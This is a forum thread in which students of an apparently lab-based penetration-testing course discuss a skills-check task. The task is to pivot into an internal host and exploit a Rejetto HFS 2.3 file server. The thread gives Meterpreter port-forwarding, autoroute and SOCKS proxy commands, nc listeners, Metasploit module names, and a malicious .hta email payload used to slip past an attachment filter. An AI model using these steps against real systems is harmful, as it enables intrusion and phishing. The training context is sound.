I am stuck on Task 3: Exploit a vulnerable file server on web.prod.local. Any guidance would be appreciated.
I know the server is Rejetto HttpFileServer httpd 2.3 after enumeration and using remote port forwarding. I also set up the autoroute through Meterpreter so I can ping it from the first compromised host, mail.server.local. I've been trying to use the rejetto_hfs_exec Metasploit module; I've tried a bind shell and a reverse_tcp shell, but am unable to exploit web.prod.local. Can someone explain to me what I am doing wrong, please?
I have the same issue. I’ve tried attacking web.prod.local in every possible way, but nothing works.
I thought there might be a problem with the lab, so I contacted support, but they told me everything is working fine and that the rejetto_hfs_exec module is not the correct method.
I’ve been struggling with this one as well. I have used both of the different Rejetto exploits, with different payloads, and tried it with proxies and with port forwarding.
No matter what I do it seems I am never able to get a shell. I have reached a point where I am not sure what I am supposed to be trying next anymore.
I tried my hand at it again today. I fiddled around with a more responsive version of the correct Rejetto exploit for a bit, to confirm it worked properly. And it did, so the flaw was with how I used it in Metasploit somewhere. I ended up using a reverse shell to get access.
This is the port forwarding I used to get a connection back.
portfwd add -R -L kaliIP -l kaliport5555 -p pivotport6666
I have a feeling this may not have been the intended way to do it, but for the life of me I could not get a bind_tcp to work.
When using the send_mail.py script, I get a reply from the SMTP server that the file type (.exe) is not allowed.
I then wrote a small script to test different executable file types, and I found only one type that is not blocked by the mail server (.hta). When sending a malicious .hta payload, I do not receive a callback to my listener.
Am I missing something trivial here? This feels like a weird point to get stuck!
This thread is a bit old, and I would like to think you all have already passed this skills check, but I will write this for anyone searching this up in the future, cuz they’re stuck xD, since I just solved it.
So instead of using Metasploit to exploit it, search online for a downloadable exploit that might work.
Keep at it, and if you have any more questions, please message me.
Hope that helps. I ran the sendemail task directly and didn't try an .exe; it's blocked directly. It worked on my side with .hta, and the listener I set up was not working with msfconsole, so I tried it with the normal nc -lvnp 4444.
Hope that helps. Rg, Tom
Hi all, I managed to get it to work by generating a .hta payload, and setting up a multi/handler in Metasploit. Turns out I was just not patient enough: the “recipient” on the other side executes the .hta after a minute or so (or maybe 2). So the standard way does work!
I haven’t had a lot of time to tackle Task 4, but I will edit this post if I clear that one.
Thank you for providing the guide above for task 2. I passed task 2 but now I still have no clue on how to work on task 3…
I tried the following commands to set up a SOCKS proxy and run nmap through proxychains.
run autoroute -s <web.prod.local IP>/20
search socks_proxy
use 0
set SRVPORT 9050
set VERSION 4a
exploit
jobs
proxychains nmap web.prod.local -sT -Pn -F
portfwd add -R -L kaliIP -l 5555 -p 6666
The nmap scan only shows http on port 80 for web.prod.local; how do you guys know it is Rejetto?
And I tried rejetto_hfs_rce_cve_2024_23692, but I am not sure which payload and which config I should use. How should I proceed?